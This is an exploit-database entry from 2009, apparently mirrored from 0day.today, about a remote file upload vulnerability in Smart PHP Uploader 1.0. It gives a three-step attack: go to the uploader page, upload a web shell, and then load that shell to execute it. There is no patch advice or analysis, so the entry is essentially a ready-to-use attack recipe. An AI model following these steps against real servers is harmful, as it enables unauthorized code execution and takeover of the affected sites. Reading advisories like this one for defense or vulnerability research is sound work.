id: 10465
date: 12/27/2009
title: Smart PHP Uploader 1.0 Remote File Upload Vulnerability
author: Phenom
cves: 

=======================================================
Smart PHP Uploader 1.0 Remote File Upload Vulnerability
=======================================================

#######################################################################
#                                                                     #
###     Smart PHP Uploader 1.0 Remote File Upload Vulnerability     ###
#                                                                     #
#######################################################################
#                                                                     #
#  Author : Phenom                                                    #
#                                                                     #
#  vendor : http://www.scriptsez.net                                  #
#                                                                     #
#  language : PHP                                                     #
#                                                                     #
#  Version : 1.0                                                      #
#                                                                     #
#######################################################################
#                                                                     #
# Exploit :                                                           #
#                                                                     #
# 1- http://server/path/phpuploader.php                               #
#                                                                     #
# 2- upload your shell                                                #
#                                                                     #
# 3- http://server/path/yourshell.php                                 #
#                                                                     #
#######################################################################



#  0day.today [2023-03-22]  #